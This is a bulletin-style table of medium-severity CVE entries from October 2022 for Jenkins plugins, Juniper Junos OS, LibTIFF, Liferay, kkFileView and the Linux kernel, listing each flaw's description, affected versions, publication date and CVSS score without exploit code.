jenkins — supporting_apis	Jenkins Pipeline: Supporting APIs Plugin 838.va_3a_087b_4055b and earlier does not sanitize or properly encode URLs of hyperlinks sending POST requests in build logs, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create Pipelines.	2022-10-19	5.4	CVE-2022-43409 CONFIRM MLIST
jenkins — tuleap_git_branch_source	A missing permission check in Jenkins Tuleap Git Branch Source Plugin 3.2.4 and earlier allows unauthenticated attackers to trigger Tuleap projects whose configured repository matches the attacker-specified value.	2022-10-19	5.3	CVE-2022-43421 CONFIRM MLIST
jenkins — xframium_builder	Jenkins XFramium Builder Plugin 1.0.22 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.	2022-10-19	4.3	CVE-2022-43432 CONFIRM MLIST
juniper — junos	An Improper Check or Handling of Exceptional Conditions vulnerability in the processing of a malformed OSPF TLV in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated adjacent attacker to cause the periodic packet management daemon (PPMD) process to go into an infinite loop, which in turn can cause protocols and functions reliant on PPMD such as OSPF neighbor reachability to be impacted, resulting in a sustained Denial of Service (DoS) condition. The DoS condition persists until the PPMD process is manually restarted. This issue affects: Juniper Networks Junos OS: All versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S5; 19.3 versions prior to 19.3R3-S3; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S3-EVO; 21.1 versions prior to 21.1R2-EVO.	2022-10-18	6.5	CVE-2022-22224 CONFIRM
juniper — junos	In VxLAN scenarios on EX4300-MP, EX4600, QFX5000 Series devices an Uncontrolled Memory Allocation vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated adjacently located attacker sending specific packets to cause a Denial of Service (DoS) condition by crashing one or more PFE’s when they are received and processed by the device. Upon automatic restart of the PFE, continued processing of these packets will cause the memory leak to reappear. Depending on the volume of packets received the attacker may be able to create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on EX4300-MP, EX4600, QFX5000 Series: 17.1 version 17.1R1 and later versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S6; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S7, 19.2R3-S1; 19.3 versions prior to 19.3R2-S6, 19.3R3-S1; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2. This issue does not affect Junos OS versions prior to 17.1R1.	2022-10-18	6.5	CVE-2022-22226 CONFIRM MISC
juniper — junos	An Improper Input Validation vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent unauthenticated attacker to cause DoS (Denial of Service). If another router generates more than one specific valid OSPFv3 LSA then rpd will crash while processing these LSAs. This issue only affects systems configured with OSPFv3, while OSPFv2 is not affected. This issue affects: Juniper Networks Junos OS 19.2 versions prior to 19.2R3-S6; 19.3 version 19.3R2 and later versions; 19.4 versions prior to 19.4R2-S8, 19.4R3-S9; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3-S2; 21.4 versions prior to 21.4R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S5-EVO; 21.1-EVO versions prior to 21.1R3-S2-EVO; 21.2-EVO versions prior to 21.2R3-S1-EVO; 21.3-EVO versions prior to 21.3R3-S2-EVO; 21.4-EVO versions prior to 21.4R2-EVO; 22.1-EVO versions prior to 22.1R2-EVO; 22.2-EVO versions prior to 22.2R2-EVO. This issue does not affect Juniper Networks Junos OS 19.2 versions prior to 19.2R2.	2022-10-18	6.5	CVE-2022-22230 CONFIRM
juniper — junos	An Improper Authentication vulnerability in the kernel of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause an impact on confidentiality or integrity. A vulnerability in the processing of TCP-AO will allow a BGP or LDP peer not configured with authentication to establish a session even if the peer is locally configured to use authentication. This could lead to untrusted or unauthorized sessions being established. This issue affects Juniper Networks Junos OS: 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS Evolved.	2022-10-18	6.5	CVE-2022-22237 CONFIRM
juniper — junos	An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). When an incoming RESV message corresponding to a protected LSP is malformed it causes an incorrect internal state resulting in an rpd core. This issue affects: Juniper Networks Junos OS All versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R3-S8; 20.1 versions prior to 20.1R3-S2; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S1; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R1-S2, 21.2R3; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved All versions prior to 20.2R3-S3-EVO; 20.3-EVO version 20.3R1-EVO and later versions; 20.4-EVO versions prior to 20.4R3-S1-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO version 21.2R1-EVO and later versions; 21.3-EVO versions prior to 21.3R2-EVO.	2022-10-18	6.5	CVE-2022-22238 CONFIRM
juniper — junos	An Improper Control of a Resource Through its Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated adjacent attacker to cause a Denial of Service (DoS). When there is a continuous mac move a memory corruption causes one or more FPCs to crash and reboot. These MAC moves can be between two local interfaces or between core/EVPN and local interface. The below error logs can be seen in PFE syslog when this issue happens: xss_event_handler(1071): EA[0:0]_PPE 46.xss[0] ADDR Error. ppe_error_interrupt(4298): EA[0:0]_PPE 46 Errors sync xtxn error xss_event_handler(1071): EA[0:0]_PPE 1.xss[0] ADDR Error. ppe_error_interrupt(4298): EA[0:0]_PPE 1 Errors sync xtxn error xss_event_handler(1071): EA[0:0]_PPE 2.xss[0] ADDR Error. This issue affects Juniper Networks Junos OS on MX Series: All versions prior to 15.1R7-S13; 19.1 versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S2; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2.	2022-10-18	6.5	CVE-2022-22249 CONFIRM
juniper — junos	An Improper Control of a Resource Through its Lifetime vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS and Junos OS Evolved allows unauthenticated adjacent attacker to cause a Denial of Service (DoS). In an EVPN-MPLS scenario, if MAC is learned locally on an access interface but later a request to delete is received indicating that the MAC was learnt remotely, this can lead to memory corruption which can result in line card crash and reload. This issue affects: Juniper Networks Junos OS All versions 17.3R1 and later versions prior to 19.2R3-S5; 19.3 versions prior to 19.3R3-S5; 19.4 versions prior to 19.4R2-S6, 19.4R3-S8; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S3; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S1; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R1-S1, 21.4R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S3-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO; 21.4-EVO versions prior to 21.4R1-S1-EVO, 21.4R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.3R1.	2022-10-18	6.5	CVE-2022-22250 CONFIRM
juniper — junos	A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim’s browser in the context of their session within J-Web. This issue affects Juniper Networks Junos OS all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.	2022-10-18	6.1	CVE-2022-22242 CONFIRM
juniper — junos	A Use After Free vulnerability in the Routing Protocol Daemon (rdp) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker to cause Denial of Service (DoS). When a BGP session flap happens, a Use After Free of a memory location that was assigned to another object can occur, which will lead to an rpd crash. This is a race condition that is outside of the attacker’s control and cannot be deterministically exploited. Continued flapping of BGP sessions can create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS: All versions prior to 18.4R2-S9, 18.4R3-S11; 19.1 versions prior to 19.1R3-S8; 19.2 version 19.2R1 and later versions; 19.3 versions prior to 19.3R3-S5; 19.4 versions prior to 19.4R2-S6, 19.4R3-S6; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S1; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R2-S1, 21.2R3. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S4-EVO; 21.1-EVO versions prior to 21.1R3-S2-EVO; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO.	2022-10-18	5.9	CVE-2022-22208 CONFIRM
juniper — junos	Due to the Improper Handling of an Unexpected Data Type in the processing of EVPN routes on Juniper Networks Junos OS and Junos OS Evolved, an attacker in direct control of a BGP client connected to a route reflector, or via a machine in the middle (MITM) attack, can send a specific EVPN route contained within a BGP Update, triggering a routing protocol daemon (RPD) crash, leading to a Denial of Service (DoS) condition. Continued receipt and processing of these specific EVPN routes could create a sustained Denial of Service (DoS) condition. This issue only occurs on BGP route reflectors, only within a BGP EVPN multicast environment, and only when one or more BGP clients have ‘leave-sync-route-oldstyle’ enabled. This issue affects: Juniper Networks Junos OS 21.3 versions prior to 21.3R3-S2; 21.4 versions prior to 21.4R2-S2, 21.4R3; 22.1 versions prior to 22.1R1-S2, 22.1R3; 22.2 versions prior to 22.2R2. Juniper Networks Junos OS Evolved 21.3 version 21.3R1-EVO and later versions prior to 21.4R3-EVO; 22.1 versions prior to 22.1R1-S2-EVO, 22.1R3-EVO; 22.2 versions prior to 22.2R2-EVO. This issue does not affect: Juniper Networks Junos OS versions prior to 21.3R1. Juniper Networks Junos OS Evolved versions prior to 21.3R1-EVO.	2022-10-18	5.9	CVE-2022-22219 CONFIRM MISC
juniper — junos	A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Routing Protocol Daemon (rpd) of Juniper Networks Junos OS, Junos OS Evolved allows a network-based unauthenticated attacker to cause a Denial of Service (DoS). When a BGP flow route with redirect IP extended community is received, and the reachability to the next-hop of the corresponding redirect IP is flapping, the rpd process might crash. Whether the crash occurs depends on the timing of the internally processing of these two events and is outside the attackers control. Please note that this issue also affects Route-Reflectors unless ‘routing-options flow firewall-install-disable’ is configured. This issue affects: Juniper Networks Junos OS: 18.4 versions prior to 18.4R2-S10, 18.4R3-S10; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.4 versions prior to 19.4R3-S8; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-EVO; 21.1-EVO versions prior to 21.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 18.4R1.	2022-10-18	5.9	CVE-2022-22220 CONFIRM
juniper — junos	A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated attacker with an established BGP session to cause a Denial of Service (DoS). In a BGP multipath scenario, when one of the contributing routes is flapping often and rapidly, rpd may crash. As this crash depends on whether a route is a contributing route, and on the internal timing of the events triggered by the flap this vulnerability is outside the direct control of a potential attacker. This issue affects: Juniper Networks Junos OS 19.2 versions prior to 19.2R3-S6; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S3; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R2; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S4-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO versions prior to 21.2R2-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect: Juniper Networks Junos OS versions 19.2 versions prior to 19.2R2, 19.3R1 and above prior to 20.2R1. Juniper Networks Junos OS Evolved versions prior to 20.2R1-EVO.	2022-10-18	5.9	CVE-2022-22225 CONFIRM
juniper — junos	An Unchecked Return Value to NULL Pointer Dereference vulnerability in Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a locally authenticated attacker with low privileges to cause a Denial of Service (DoS). In Segment Routing (SR) to Label Distribution Protocol (LDP) interworking scenario, configured with Segment Routing Mapping Server (SRMS) at any node, when an Area Border Router (ABR) leaks the SRMS entries having “S” flag set from IS-IS Level 2 to Level 1, an rpd core might be observed when a specific low privileged CLI command is issued. This issue affects: Juniper Networks Junos OS 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R2. Juniper Networks Junos OS Evolved 21.4-EVO versions prior to 21.4R1-S2-EVO, 21.4R2-S1-EVO, 21.4R3-EVO; 22.1-EVO versions prior to 22.1R2-EVO. This issue does not affect: Juniper Networks Junos OS versions prior to 21.4R1. Juniper Networks Junos OS Evolved versions prior to 21.4R1-EVO.	2022-10-18	5.5	CVE-2022-22233 CONFIRM
juniper — junos	An Improper Preservation of Consistency Between Independent Representations of Shared State vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a locally authenticated attacker with low privileges to cause a Denial of Service (DoS). If the device is very busy for example while executing a series of show commands on the CLI one or more SFPs might not be detected anymore. The system then changes its state to “unplugged” which is leading to traffic impact and at least a partial DoS. Once the system is less busy the port states return to their actual value. Indicators of compromise are log messages about unplugged SFPs and corresponding syspld messages without any physical or environmental cause. These can be checked by issuing the following commands: user@device# show log messages \| match unplugged %PFE-6: fpc0 sfp-0/1/2 SFP unplugged %PFE-6: fpc0 sfp-0/1/3 SFP unplugged The following log messages will also be seen when this issue happens: fpc0 Error tvp_drv_syspld_read: syspld read failed for address <address> fpc0 Error[-1]:tvp_optics_presence_get – Syspld read failed for port <pic/port> fpc0 optics pres failed(-1) for pic <pic> port <port> fpc0 tvp_drv_syspld_read: i2c access retry count 200 This issue affects Juniper Networks Junos OS on EX2300 Series, EX3400 Series: All versions prior to 18.4R3-S11; 19.1 versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R1-S9, 19.2R3-S5; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S4; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S1; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R2.	2022-10-18	5.5	CVE-2022-22234 CONFIRM
juniper — junos	An Allocation of Resources Without Limits or Throttling and a Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a locally authenticated low privileged attacker to cause a Denial of Sevice (DoS). In a high-scaled BGP routing environment with rib-sharding enabled, two issues may occur when executing a specific CLI command. One is a memory leak issue with rpd where the leak rate is not constant, and the other is a temporary spike in rpd memory usage during command execution. This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S1; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R1-S2, 21.2R2-S1, 21.2R3; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S1-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO versions prior to 21.2R1-S2-EVO, 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 19.2R1.	2022-10-18	5.5	CVE-2022-22240 CONFIRM
juniper — junos	An XPath Injection vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker sending a crafted POST to reach the XPath channel, which may allow chaining to other unspecified vulnerabilities, leading to a partial loss of confidentiality. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2.	2022-10-18	5.3	CVE-2022-22244 CONFIRM
juniper — junos	An XPath Injection vulnerability due to Improper Input Validation in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to add an XPath command to the XPath stream, which may allow chaining to other unspecified vulnerabilities, leading to a partial loss of confidentiality. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.	2022-10-18	4.3	CVE-2022-22243 CONFIRM
juniper — junos	A Path Traversal vulnerability in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to upload arbitrary files to the device by bypassing validation checks built into Junos OS. The attacker should not be able to execute the file due to validation checks built into Junos OS. Successful exploitation of this vulnerability could lead to loss of filesystem integrity. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.	2022-10-18	4.3	CVE-2022-22245 CONFIRM
juniper — junos_os_evolved	An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS Evolved on ACX7000 Series allows an unauthenticated network-based attacker to cause a partial Denial of Service (DoS). On receipt of specific IPv6 transit traffic, Junos OS Evolved on ACX7100-48L, ACX7100-32C and ACX7509 sends this traffic to the Routing Engine (RE) instead of forwarding it, leading to increased CPU utilization of the RE and a partial DoS. This issue only affects systems configured with IPv6. This issue does not affect ACX7024 which is supported from 22.3R1-EVO onwards where the fix has already been incorporated as indicated in the solution section. This issue affects Juniper Networks Junos OS Evolved on ACX7100-48L, ACX7100-32C, ACX7509: 21.1-EVO versions prior to 21.1R3-S2-EVO; 21.2-EVO versions prior to 21.2R3-S2-EVO; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R1-S1-EVO, 21.4R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 21.1R1-EVO.	2022-10-18	5.3	CVE-2022-22227 CONFIRM
keking — kkfileview	kkFileView 4.0 is vulnerable to Cross Site Scripting (XSS) via controller Filecontroller.java.	2022-10-17	6.1	CVE-2022-42147 MISC
libtiff — libtiff	LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6826, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.	2022-10-21	6.5	CVE-2022-3597 MISC MISC CONFIRM
libtiff — libtiff	LibTIFF 4.4.0 has an out-of-bounds write in extractContigSamplesShifted24bits in tools/tiffcrop.c:3604, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit cfbb883b.	2022-10-21	6.5	CVE-2022-3598 CONFIRM MISC MISC
libtiff — libtiff	LibTIFF 4.4.0 has an out-of-bounds read in writeSingleSection in tools/tiffcrop.c:7345, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125.	2022-10-21	6.5	CVE-2022-3599 MISC MISC CONFIRM
libtiff — libtiff	LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemset in libtiff/tif_unix.c:340 when called from processCropSelections, tools/tiffcrop.c:7619, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.	2022-10-21	6.5	CVE-2022-3626 CONFIRM MISC MISC
libtiff — libtiff	LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6860, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.	2022-10-21	6.5	CVE-2022-3627 MISC MISC CONFIRM
liferay — dxp	A Cross-site scripting (XSS) vulnerability in Document Library module in Liferay Portal 7.4.3.30 through 7.4.3.36, and Liferay DXP 7.4 update 30 through update 36 allows remote attackers to inject arbitrary web script or HTML via the `redirect` parameter.	2022-10-18	6.1	CVE-2022-42113 MISC MISC
liferay — dxp	A Cross-site scripting (XSS) vulnerability in the Frontend Editor module’s integration with CKEditor in Liferay Portal 7.3.2 through 7.4.3.14, and Liferay DXP 7.3 before update 6, and 7.4 before update 15 allows remote attackers to inject arbitrary web script or HTML via the (1) name, or (2) namespace parameter.	2022-10-18	6.1	CVE-2022-42116 MISC MISC
liferay — dxp	A Cross-site scripting (XSS) vulnerability in the Frontend Taglib module in Liferay Portal 7.3.2 through 7.4.3.16, and Liferay DXP 7.3 before update 6, and 7.4 before update 17 allows remote attackers to inject arbitrary web script or HTML.	2022-10-18	6.1	CVE-2022-42117 MISC MISC
liferay — dxp	A Cross-site scripting (XSS) vulnerability in the Document and Media module – file upload functionality in Liferay Digital Experience Platform 7.3.10 SP3 allows remote attackers to inject arbitrary JS script or HTML into the description field of uploaded svg file.	2022-10-19	5.4	CVE-2022-38901 MISC MISC MISC
liferay — dxp	A Cross-site scripting (XSS) vulnerability in the Portal Search module’s Sort widget in Liferay Portal 7.2.0 through 7.4.3.24, and Liferay DXP 7.2 before fix pack 19, 7.3 before update 5, and DXP 7.4 before update 25 allows remote attackers to inject arbitrary web script or HTML via a crafted payload.	2022-10-18	5.4	CVE-2022-42112 MISC MISC
liferay — dxp	A Cross-site scripting (XSS) vulnerability in the Role module’s edit role assignees page in Liferay Portal 7.4.0 through 7.4.3.36, and Liferay DXP 7.4 before update 37 allows remote attackers to inject arbitrary web script or HTML.	2022-10-18	5.4	CVE-2022-42114 MISC MISC
liferay — liferay_portal	Cross-site scripting (XSS) vulnerability in the Object module’s edit object details page in Liferay Portal 7.4.3.4 through 7.4.3.36 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the object field’s `Label` text field.	2022-10-18	5.4	CVE-2022-42115 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function get_syms of the file tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier VDB-211029 was assigned to this vulnerability.	2022-10-17	5.7	CVE-2022-3531 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function test_map_kptr_success/test_fentry of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211030 is the identifier assigned to this vulnerability.	2022-10-17	5.7	CVE-2022-3532 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects the function parse_usdt_arg of the file tools/lib/bpf/usdt.c of the component BPF. The manipulation of the argument reg_name leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211031.	2022-10-17	5.7	CVE-2022-3533 N/A N/A
linux — linux_kernel	A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function read_50_controller_cap_complete of the file tools/mgmt-tester.c of the component BlueZ. The manipulation of the argument cap_len leads to null pointer dereference. It is recommended to apply a patch to fix this issue. VDB-211086 is the identifier assigned to this vulnerability.	2022-10-17	5.7	CVE-2022-3563 MISC MISC
linux — linux_kernel	A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function bnx2x_tpa_stop of the file drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211042 is the identifier assigned to this vulnerability.	2022-10-17	5.5	CVE-2022-3542 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function unix_sock_destructor/unix_release_sock of the file net/unix/af_unix.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211043.	2022-10-17	5.5	CVE-2022-3543 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as problematic, was found in Linux Kernel. Affected is the function damon_sysfs_add_target of the file mm/damon/sysfs.c of the component Netfilter. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211044.	2022-10-17	5.5	CVE-2022-3544 N/A N/A
linux — linux_kernel	A flaw was found in the Linux kernel’s networking code. A use-after-free was found in the way the sch_sfb enqueue function used the socket buffer (SKB) cb field after the same SKB had been enqueued (and freed) into a child qdisc. This flaw allows a local, unprivileged user to crash the system, causing a denial of service.	2022-10-19	5.5	CVE-2022-3586 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function mptcp_limit_get_set of the file ip/ipmptcp.c of the component iproute2. The manipulation leads to memory leak. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. VDB-211362 is the identifier assigned to this vulnerability.	2022-10-18	5.5	CVE-2022-3593 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been rated as problematic. Affected by this issue is the function sess_free_buffer of the file fs/cifs/sess.c of the component CIFS Handler. The manipulation leads to double free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211364.	2022-10-18	5.5	CVE-2022-3595 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability.	2022-10-19	5.5	CVE-2022-3606 N/A N/A
linux — linux_kernel	A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function jlink_init of the file monitor/jlink.c of the component BlueZ. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211936.	2022-10-21	5.5	CVE-2022-3637 N/A N/A
linux — linux_kernel	A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code.	2022-10-14	5.5	CVE-2022-42721 MISC MISC MISC FEDORA FEDORA FEDORA DEBIAN
linux — linux_kernel	In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices.	2022-10-14	5.5	CVE-2022-42722 MISC MISC MISC FEDORA FEDORA FEDORA DEBIAN
